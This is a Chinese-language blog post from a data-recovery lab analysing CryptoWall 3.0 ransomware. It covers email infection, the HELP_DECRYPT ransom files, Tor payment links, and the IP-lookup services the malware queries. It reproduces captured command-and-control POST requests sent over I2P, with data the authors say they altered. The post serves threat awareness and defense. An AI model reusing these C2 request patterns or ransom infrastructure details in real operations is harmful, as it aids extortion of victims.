• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    硬盘基地手机版
  • 关注官方公众号
    微信扫一扫关注
    硬盘基地公众号
  • Office文档被加密了!不是被勒索数据软件CryptoWall加密了吧

    INTOHARD数据恢复实验室遇到了一例特别的数据加密勒索——它使用I2P匿名网络进行通信,名为Cryptowall 3.0,客户硬盘内所有的Office文档Word/Excel被加密勒索病毒加密,硬盘用户需要恢复被加密的Office文档数据:

    Office文档被加密了!不是被勒索数据软件CryptoWall加密了吧


    What happened to your files ?
    All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.

    通过数据及表现证实为Cryptowall 3.0,通过硬盘的用户描述,可能是在邮件附件中捆绑了Cryptowall 3.0导致感染,它以附档的方式,透过邮件散播,诱使不留心者解开附件文档,然后很快你就会看到令人冷汗直冒的「红色死亡画面」。画面出现时,表示电脑中所有的档案已经以公开金钥架构(Public-key Infrastructure,PKI)的公钥全数加密完成,没有私钥便无法解开。我们找到了Cryptowall 的一些相关信息:

    一天感染288个用户

    来自法国的安全研究员Kafeine在其博客中确认了这款软件使用I2P匿名网络进行C&C通讯,在@Horgh_RCE的反编译下为我们揭开了Cryptowall 3.0的面纱。
    微软提供的数据显示从1月11日至1月12日一天时间里,Cryptowall感染了288个用户。

        HELP_DECRYPT.HTML
        HELP_DECRYPT.PNG
        HELP_DECRYPT.TXT
        HELP_DECRYPT.URL
    只要有Office文档的地方就多了4个这样命名的文件,相较之前的变种,软件在用于勒索的提示文件的文件名上有少许变化:

    贴心的用户体验

    Office文档被加密了!不是被勒索数据软件CryptoWall加密了吧

    以下则是HELP_DECRYPT.PNG的内容:

    Office文档被加密了!不是被勒索数据软件CryptoWall加密了吧


    该款勒索软件十分贴心,HELP_DECRYPT.PNG语言版本是根据用户的IP决定的,如法国安全研究员Kafeine的HELP_DECRYPT.PNG:


    Office文档被加密了!不是被勒索数据软件CryptoWall加密了吧


    针对不同的用户,文中的链接也各不相同。以下是Kafeine提供的一组链接:

    http://paytoc4gtpn5czl2.torforall.com/1c3L59z

    http://paytoc4gtpn5czl2.torman2.com/1c3L59z

    http://paytoc4gtpn5czl2.torwoman.com/1c3L59z

    http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z

    软件完成对用户文件的加密后会提示用户使用比特币支付赎金。自CoinVault之后,免费解密一个文件似乎要变成行业标准了,CryptoWall 3.0也附带了这一功能:

    Office文档被加密了!不是被勒索数据软件CryptoWall加密了吧


    软件使用以下服务获取IP:

    "http://ip-addr.es"

    "http://myexternalip.com/raw"

    "http://curlmyip.com"

    I2P协议传输

    与C&C服务器的通讯似乎是通过Rc4加密了,并且数据通过i2p协议传输:

    --------------数据稍经修改-------
    POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Pragma: no-cache
    Content-Length: 134
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
    Host: proxy2-2-2.i2p
    v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c
    ---------------数据稍经修改-------
    POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Pragma: no-cache
    Content-Length: 134
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
    Host: proxy1-1-1.i2p
    z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
    --------------------------------------------------

    经过解密后的数据:(不要尝试解密前面的数据,我们故意修改了有些十六进制数)
    z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}

    参考来源Malware don't need Coffee & TechNet,译/Sphinx 


    开心

    鄙视
    12

    鼓掌
    1

    愤怒
    1

    可怜

    刚表态过的朋友 (14 人)

    该文章已有6人参与评论

    请发表评论

    全部评论

    查看全部评论>>

    粉丝3 阅读18335 回复6
    上一篇:
    技嘉与Cavium团队联手打造超密集型ARM服务器发布时间:2015-06-02
    下一篇:
    美国绝密文件遭破解:英国急撤间谍发布时间:2015-06-15
    热门推荐
    专题导读
    热门话题
    阅读排行榜

    扫描微信二维码

    查看手机版网站

    随时了解更新最新资讯

    .

    在线客服(服务时间 9:00~18:00)

    在线QQ客服
    .
    Email:9443120@qq.com
    移动电话:13011628855

    Powered by Intohard X1.0© 2001-2013 Inhdd Inc.( 鲁ICP备09029790号 )